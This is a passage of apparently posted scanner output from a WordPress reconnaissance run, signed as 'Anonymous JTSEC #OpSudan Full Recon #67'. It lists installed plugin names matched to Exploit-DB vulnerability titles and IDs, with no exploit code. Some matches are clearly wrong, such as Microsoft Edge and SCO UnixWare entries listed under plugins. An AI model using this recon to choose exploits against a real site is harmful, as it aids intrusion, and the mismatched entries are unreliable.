- [M] EDB-ID: 17767 "WordPress Plugin SearchAutocomplete 1.0.8 - SQL Injection"
- [I] securimage-wp
- [M] EDB-ID: 38510 "WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting"
- [I] sell-downloads
- [M] EDB-ID: 38868 "WordPress Plugin Sell Download 1.0.16 - Local File Disclosure"
- [I] sendit
- [M] EDB-ID: 17716 "WordPress Plugin SendIt 1.5.9 - Blind SQL Injection"
- [I] seo-automatic-seo-tools
- [M] EDB-ID: 34975 "WordPress Plugin SEO Tools 3.0 - 'file' Directory Traversal"
- [I] seo-watcher
- [M] EDB-ID: 38782 "WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution"
- [I] sermon-browser
- [M] EDB-ID: 17214 "WordPress Plugin SermonBrowser 0.43 - SQL Injection"
- [M] EDB-ID: 35657 "WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection"
- [I] sexy-contact-form
- [M] EDB-ID: 34922 "WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload"
- [M] EDB-ID: 35057 "WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload"
- [I] sf-booking
- [M] EDB-ID: 43475 "WordPress Plugin Service Finder Booking < 3.2 - Local File Disclosure"
- [I] sfbrowser
- [M] EDB-ID: 19054 "WordPress Plugin SfBrowser 1.4.5 - Arbitrary File Upload"
- [I] sfwd-lms
- [I] sh-slideshow
- [M] EDB-ID: 17748 "WordPress Plugin SH Slideshow 3.1.4 - SQL Injection"
- [I] sharebar
- [M] EDB-ID: 37201 "WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting"
- [I] si-contact-form
- [M] EDB-ID: 36050 "WordPress Plugin Fast Secure Contact Form 3.0.3.1 - 'index.php' Cross-Site Scripting"
- [I] simple-ads-manager
- [M] EDB-ID: 36613 "WordPress Plugin Simple Ads Manager - Multiple SQL Injections"
- [M] EDB-ID: 36614 "WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload"
- [M] EDB-ID: 36615 "WordPress Plugin Simple Ads Manager - Information Disclosure"
- [M] EDB-ID: 39133 "WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection"
- [I] simple-download-button-shortcode
- [M] EDB-ID: 19020 "WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure"
- [I] simple-fields
- [M] EDB-ID: 44425 "WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution"
- [I] simple-forum
- [I] site-editor
- [M] EDB-ID: 44340 "Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion"
- [I] site-import
- [M] EDB-ID: 39558 "WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion"
- [I] skysa-official
- [M] EDB-ID: 36363 "WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting"
- [I] slider-image
- [M] EDB-ID: 37361 "WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities"
- [I] slideshow-gallery-2
- [M] EDB-ID: 36631 "WordPress Plugin Slideshow Gallery 1.1.x - 'border' Cross-Site Scripting"
- [I] slideshow-jquery-image-gallery
- [M] EDB-ID: 37948 "WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities"
- [I] smart-flv
- [M] EDB-ID: 38331 "WordPress Plugin Smart Flv - 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities"
- [I] smart-google-code-inserter
- [I] sniplets
- [M] EDB-ID: 5194 "Wansview 1.0.2 - Denial of Service (PoC)"
- [I] social-discussions
- [M] EDB-ID: 22158 "WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities"
- [I] social-slider-2
- [M] EDB-ID: 17617 "WordPress Plugin Social Slider 5.6.5 - SQL Injection"
- [I] socialfit
- [M] EDB-ID: 37481 "WordPress Plugin SocialFit - 'msg' Cross-Site Scripting"
- [I] sodahead-polls
- [I] sp-client-document-manager
- [M] EDB-ID: 35313 "WordPress Plugin SP Client Document Manager 2.4.1 - SQL Injection"
- [M] EDB-ID: 36576 "WordPress Plugin SP Project & Document Manager 2.5.3 - Blind SQL Injection"
- [I] spicy-blogroll
- [M] EDB-ID: 26804 "WordPress Plugin Spicy Blogroll - Local File Inclusion"
- [I] spider-event-calendar
- [M] EDB-ID: 25723 "WordPress Plugin Spider Event Calendar 1.3.0 - Multiple Vulnerabilities"
- [I] spiffy
- [M] EDB-ID: 38441 "WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection"
- [I] st_newsletter
- [M] EDB-ID: 31096 "WordPress Plugin ShiftThis NewsLetter - SQL Injection"
- [M] EDB-ID: 6777 "Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)"
- [I] store-locator-le
- [M] EDB-ID: 18989 "WordPress Plugin Google Maps via Store Locator 2.7.1 < 3.0.1 - Multiple Vulnerabilities"
- [I] taggator
- [I] taggedalbums
- [M] EDB-ID: 38023 "WordPress Plugin Tagged Albums - 'id' SQL Injection"
- [I] tagninja
- [M] EDB-ID: 35300 "WordPress Plugin TagNinja 1.0 - 'id' Cross-Site Scripting"
- [I] tera-charts
- [M] EDB-ID: 39256 "WordPress Plugin Tera Charts (tera-charts) - '/charts/treemap.php?fn' Directory Traversal"
- [M] EDB-ID: 39257 "WordPress Plugin Tera Charts (tera-charts) - '/charts/zoomabletreemap.php?fn' Directory Traversal"
- [I] the-welcomizer
- [M] EDB-ID: 36445 "WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting"
- [I] thecartpress
- [M] EDB-ID: 17860 "WordPress Plugin TheCartPress 1.1.1 - Remote File Inclusion"
- [M] EDB-ID: 36481 "WordPress Plugin TheCartPress 1.6 - 'OptionsPostsList.php' Cross-Site Scripting"
- [M] EDB-ID: 38869 "WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities"
- [I] thinkun-remind
- [M] EDB-ID: 19021 "WordPress Plugin Thinkun Remind 1.1.3 - Remote File Disclosure"
- [I] tinymce-thumbnail-gallery
- [M] EDB-ID: 19022 "WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure"
- [I] topquark
- [M] EDB-ID: 19053 "WordPress Plugin Top Quark Architecture 2.10 - Arbitrary File Upload"
- [I] track-that-stat
- [M] EDB-ID: 37204 "WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting"
- [I] trafficanalyzer
- [M] EDB-ID: 38439 "WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting"
- [I] tune-library
- [M] EDB-ID: 17816 "WordPress Plugin Tune Library 2.17 - SQL Injection"
- [I] ucan-post
- [M] EDB-ID: 18390 "WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting"
- [I] ultimate-product-catalogue
- [M] EDB-ID: 36823 "WordPress Plugin Ultimate Product Catalogue - SQL Injection (1)"
- [M] EDB-ID: 36824 "WordPress Plugin Ultimate Product Catalogue - SQL Injection (2)"
- [M] EDB-ID: 36907 "WordPress Plugin Ultimate Product Catalogue 3.1.2 - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / Arbitrary File Upload Vulnerabilities"
- [M] EDB-ID: 39974 "WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation"
- [M] EDB-ID: 40012 "WordPress Plugin Ultimate Product Catalog 3.8.6 - Arbitrary File Upload"
- [M] EDB-ID: 40174 "WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection"
- [I] ungallery
- [M] EDB-ID: 17704 "WordPress Plugin UnGallery 1.5.8 - Local File Disclosure"
- [I] uploader
- [M] EDB-ID: 35255 "WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting"
- [M] EDB-ID: 38163 "WordPress Plugin Uploader - Arbitrary File Upload"
- [M] EDB-ID: 38355 "WordPress Plugin Uploader - 'blog' Cross-Site Scripting"
- [I] uploadify-integration
- [M] EDB-ID: 37070 "WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities"
- [I] uploads
- [I] upm-polls
- [M] EDB-ID: 17627 "WordPress Plugin UPM Polls 1.0.3 - SQL Injection"
- [I] user-avatar
- [I] user-meta
- [M] EDB-ID: 19052 "WordPress Plugin User Meta 1.1.1 - Arbitrary File Upload"
- [I] userpro
- [M] EDB-ID: 46083 "Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation"
- [I] users-ultra
- [I] vc-extensions-bundle
- [I] verve-meta-boxes
- [I] videowhisper-live-streaming-integration
- [M] EDB-ID: 31986 "WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities"
- [I] videowhisper-video-conference-integration
- [M] EDB-ID: 36617 "WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload"
- [M] EDB-ID: 36618 "WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload"
- [I] videowhisper-video-presentation
- [M] EDB-ID: 17771 "WordPress Plugin VideoWhisper Video Presentation 1.1 - SQL Injection"
- [M] EDB-ID: 37357 "WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload"
- [I] vk-gallery
- [I] vodpod-video-gallery
- [M] EDB-ID: 34976 "WordPress Plugin Vodpod Video Gallery 3.1.5 - 'vodpod_gallery_thumbs.php' Cross-Site Scripting"
- [I] wassup
- [I] webinar_plugin
- [M] EDB-ID: 22300 "WordPress Plugin Easy Webinar - Blind SQL Injection"
- [I] webplayer
- [I] website-contact-form-with-file-upload
- [M] EDB-ID: 36952 "WordPress Plugin N-Media Website Contact Form with File Upload 1.5 - Local File Inclusion"
- [I] website-faq
- [M] EDB-ID: 19400 "WordPress Plugin Website FAQ 1.0 - SQL Injection"
- [I] wechat-broadcast
- [M] EDB-ID: 45438 "WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion"
- [I] woocommerce
- [M] EDB-ID: 43196 "WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal"
- [I] woopra
- [M] EDB-ID: 38783 "WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution"
- [I] wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg
- [M] EDB-ID: 17763 "Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference"
- [I] wordpress-member-private-conversation
- [M] EDB-ID: 37353 "WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload"
- [I] wordpress-processing-embed
- [M] EDB-ID: 35066 "WordPress Plugin Processing Embed 0.5 - 'pluginurl' Cross-Site Scripting"
- [I] wordtube
- [M] EDB-ID: 3825 "GoodiWare GoodReader iPhone - '.XLS' Denial of Service"
- [I] work-the-flow-file-upload
- [M] EDB-ID: 36640 "WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload"
- [I] wp-adserve
- [I] wp-audio-gallery-playlist
- [M] EDB-ID: 17756 "WordPress Plugin Audio Gallery Playlist 0.12 - SQL Injection"
- [I] wp-automatic
- [M] EDB-ID: 19187 "WordPress Plugin Automatic 2.0.3 - SQL Injection"
- [I] wp-autosuggest
- [M] EDB-ID: 45977 "WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection"
- [I] wp-autoyoutube
- [M] EDB-ID: 18353 "WordPress Plugin wp-autoyoutube - Blind SQL Injection"
- [I] wp-bannerize
- [M] EDB-ID: 17764 "WordPress Plugin Bannerize 2.8.6 - SQL Injection"
- [M] EDB-ID: 17906 "WordPress Plugin Bannerize 2.8.7 - SQL Injection"
- [M] EDB-ID: 36193 "WordPress Plugin WP Bannerize 2.8.7 - 'ajax_sorter.php' SQL Injection"
- [I] wp-banners-lite
- [M] EDB-ID: 38410 "WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection"
- [I] wp-booking-calendar
- [M] EDB-ID: 44769 "Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting"
- [I] wp-business-intelligence
- [M] EDB-ID: 36600 "WordPress Plugin Business Intelligence - SQL Injection (Metasploit)"
- [I] wp-business-intelligence-lite
- [I] wp-cal
- [M] EDB-ID: 4992 "Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)"
- [I] wp-comment-remix
- [I] wp-content
- [M] EDB-ID: 37123 "WordPress Plugin WPsc MijnPress - 'rwflush' Cross-Site Scripting"
- [I] wp-copysafe-pdf
- [M] EDB-ID: 39254 "WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload"
- [I] wp-cumulus
- [M] EDB-ID: 10228 "WordPress Plugin WP-Cumulus 1.20 - Full Path Disclosure / Cross-Site Scripting"
- [M] EDB-ID: 33371 "WordPress Plugin WP-Cumulus 1.x - 'tagcloud.swf' Cross-Site Scripting"
- [I] wp-custom-pages
- [M] EDB-ID: 17119 "WordPress Plugin Custom Pages 0.5.0.1 - Local File Inclusion"
- [I] wp-ds-faq
- [M] EDB-ID: 17683 "WordPress Plugin DS FAQ 1.3.2 - SQL Injection"
- [I] wp-e-commerce
- [M] EDB-ID: 36018 "WordPress Plugin WP E-Commerce 3.8.6 - 'cart_messages[]' Cross-Site Scripting"
- [I] wp-easycart
- [M] EDB-ID: 35730 "WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload"
- [I] wp-ecommerce-shop-styling
- [M] EDB-ID: 37530 "WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download"
- [I] wp-events-calendar
- [M] EDB-ID: 44785 "WordPress Plugin Events Calendar - SQL Injection"
- [I] wp-featured-post-with-thumbnail
- [M] EDB-ID: 35262 "WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting"
- [I] wp-filebase
- [M] EDB-ID: 17808 "WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection"
- [I] wp-filemanager
- [M] EDB-ID: 25440 "WordPress Plugin wp-FileManager - Arbitrary File Download"
- [M] EDB-ID: 38515 "WordPress Plugin wp-FileManager - 'path' Arbitrary File Download"
- [M] EDB-ID: 4844 "STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution"
- [I] wp-footnotes
- [M] EDB-ID: 31092 "WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities"
- [I] wp-forum
- [M] EDB-ID: 7738 "WordPress Plugin WP-Forum 1.7.8 - SQL Injection"
- [I] wp-glossary
- [M] EDB-ID: 18055 "WordPress Plugin Glossary - SQL Injection"
- [I] wp-google-drive
- [M] EDB-ID: 44435 "WordPress Plugin Google Drive 2.2 - Remote Code Execution"
- [I] wp-gpx-maps
- [M] EDB-ID: 19050 "WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload"
- [I] wp-imagezoom
- [M] EDB-ID: 37243 "WordPress Plugin Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities"
- [M] EDB-ID: 37419 "WordPress Plugin Wp-ImageZoom - 'file' Remote File Disclosure"
- [M] EDB-ID: 38063 "WordPress Theme Wp-ImageZoom - 'id' SQL Injection"
- [I] wp-livephp
- [M] EDB-ID: 36483 "WordPress Plugin WP Live.php 1.2.1 - 's' Cross-Site Scripting"
- [I] wp-lytebox
- [I] wp-marketplace
- [I] wp-menu-creator
- [M] EDB-ID: 17689 "WordPress Plugin Menu Creator 1.1.7 - SQL Injection"
- [I] wp-mobile-detector
- [M] EDB-ID: 39891 "WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload"
- [I] wp-people
- [M] EDB-ID: 31230 "WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection"
- [I] wp-polls
- [M] EDB-ID: 10256 "WordPress Plugin WP-Polls 2.x - Incorrect Flood Filter"
- [I] wp-property
- [M] EDB-ID: 18987 "WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload"
- [I] wp-publication-archive
- [M] EDB-ID: 35263 "WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure"
- [I] wp-realty
- [M] EDB-ID: 29021 "WordPress Plugin Realty - Blind SQL Injection"
- [M] EDB-ID: 38808 "WordPress Plugin WP-Realty - 'listing_id' SQL Injection"
- [M] EDB-ID: 39109 "WordPress Plugin Relevanssi - 'category_name' SQL Injection"
- [I] wp-responsive-thumbnail-slider
- [M] EDB-ID: 45099 "WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)"
- [I] wp-safe-search
- [M] EDB-ID: 35067 "WordPress Plugin Safe Search - 'v1' Cross-Site Scripting"
- [I] wp-shopping-cart
- [M] EDB-ID: 6867 "Apple Mac OSX Software Update - Command Execution (Metasploit)"
- [I] wp-source-control
- [M] EDB-ID: 39287 "WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal"
- [I] wp-spamfree
- [M] EDB-ID: 17970 "WordPress Plugin WP-SpamFree Spam Plugin - SQL Injection"
- [I] wp-starsratebox
- [M] EDB-ID: 35634 "WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection"
- [I] wp-stats-dashboard
- [I] wp-support-plus-responsive-ticket-system
- [M] EDB-ID: 34589 "SCO UnixWare < 7.1.4 p534589 - 'pkgadd' Local Privilege Escalation"
- [I] wp-survey-and-quiz-tool
- [M] EDB-ID: 34974 "WordPress Plugin WP Survey And Quiz Tool 1.2.1 - Cross-Site Scripting"
- [I] wp-swimteam
- [M] EDB-ID: 37601 "WordPress Plugin Swim Team 1.44.10777 - Arbitrary File Download"
- [I] wp-symposium
- [M] EDB-ID: 17679 "WordPress Plugin Symposium 0.64 - SQL Injection"
- [M] EDB-ID: 35505 "WordPress Plugin Symposium 14.10 - SQL Injection"
- [M] EDB-ID: 35543 "WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload"
- [M] EDB-ID: 37822 "WordPress Plugin WP Symposium 15.1 - Blind SQL Injection"
- [M] EDB-ID: 37824 "WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection"
- [I] wp-syntax
- [M] EDB-ID: 9431 "Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption"
- [I] wp-table
- [M] EDB-ID: 3824 "Office^2 iPhone - '.XLS' Denial of Service"
- [I] wp-table-reloaded
- [M] EDB-ID: 38251 "WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting"
- [I] wp-twitter-feed
- [M] EDB-ID: 35084 "WordPress Plugin Twitter Feed - 'url' Cross-Site Scripting"
- [I] wp-whois
- [M] EDB-ID: 36488 "WordPress Plugin WHOIS 1.4.2 3 - 'domain' Cross-Site Scripting"
- [I] wp-with-spritz
- [M] EDB-ID: 44544 "WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion"
- [I] wpSS
- [M] EDB-ID: 39279 "WordPress Plugin wpSS - 'ss_handler.php' SQL Injection"
- [M] EDB-ID: 5486 "PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service"
- [I] wp_rokintroscroller
- [M] EDB-ID: 38767 "WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities"
- [I] wp_rokmicronews
- [M] EDB-ID: 38768 "WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities"
- [I] wp_roknewspager
- [M] EDB-ID: 38756 "WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities"
- [I] wp_rokstories
- [M] EDB-ID: 38757 "WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities"
- [I] wpeasystats
- [M] EDB-ID: 17862 "WordPress Plugin WPEasyStats 1.8 - Remote File Inclusion"
- [I] wpforum
- [M] EDB-ID: 17684 "WordPress Plugin Forum 1.7.8 - SQL Injection"
- [I] wpmarketplace
- [M] EDB-ID: 18988 "WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload"
- [I] wpsite-background-takeover
- [M] EDB-ID: 44417 "WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal"
- [I] wpstorecart
- [M] EDB-ID: 19023 "ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions"
- [I] wptf-image-gallery
- [M] EDB-ID: 37751 "WordPress Plugin WPTF Image Gallery 1.03 - Arbitrary File Download"
- [I] wptouch
- [M] EDB-ID: 18039 "WordPress Plugin wptouch - SQL Injection"
- [I] x7host-videox7-ugc-plugin
- [M] EDB-ID: 35257 "WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting"
- [M] EDB-ID: 35264 "WordPress Plugin Featured Content 0.0.1 - 'listid' Cross-Site Scripting"
- [I] xcloner-backup-and-restore
- [M] EDB-ID: 16246 "Joomla! Component com_xcloner-backupandrestore - Remote Command Execution"
- [I] xerte-online
- [M] EDB-ID: 38157 "WordPress Plugin Xerte Online - 'save.php' Arbitrary File Upload"
- [I] xml-and-csv-import-in-article-content
- [M] EDB-ID: 39576 "WordPress Plugin Import CSV 1.0 - Directory Traversal"
- [I] xorbin-analog-flash-clock
- [M] EDB-ID: 38608 "WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Cross-Site Scripting"
- [I] xorbin-digital-flash-clock
- [M] EDB-ID: 38621 "WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Cross-Site Scripting"
- [I] yolink-search
- [M] EDB-ID: 17757 "WordPress Plugin yolink Search 1.1.4 - SQL Injection"
- [I] yousaytoo-auto-publishing-plugin
- [M] EDB-ID: 36620 "WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Cross-Site Scripting"
- [I] yt-audio-streaming-audio-from-youtube
- [M] EDB-ID: 35394 "WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting"
- [I] zarzadzanie_kontem
- [M] EDB-ID: 38050 "WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload"
- [I] zingiri-forum
- [M] EDB-ID: 38101 "WordPress Plugin Zingiri Forums - 'language' Local File Inclusion"
- [I] zingiri-web-shop
- [M] EDB-ID: 17867 "WordPress Plugin Zingiri Web Shop 2.2.0 - Remote File Inclusion"
- [M] EDB-ID: 37406 "WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload"
- [M] EDB-ID: 38046 "WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload"
- [I] zotpress
- [M] EDB-ID: 17778 "WordPress Plugin Zotpress 4.4 - SQL Injection"
- [I] Checking for Directory Listing Enabled ...
- [-] Date & Time: 02/05/2019 06:32:58
- [-] Completed in: 0:13:49
- #######################################################################################################################################
- Anonymous JTSEC #OpSudan Full Recon #67
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement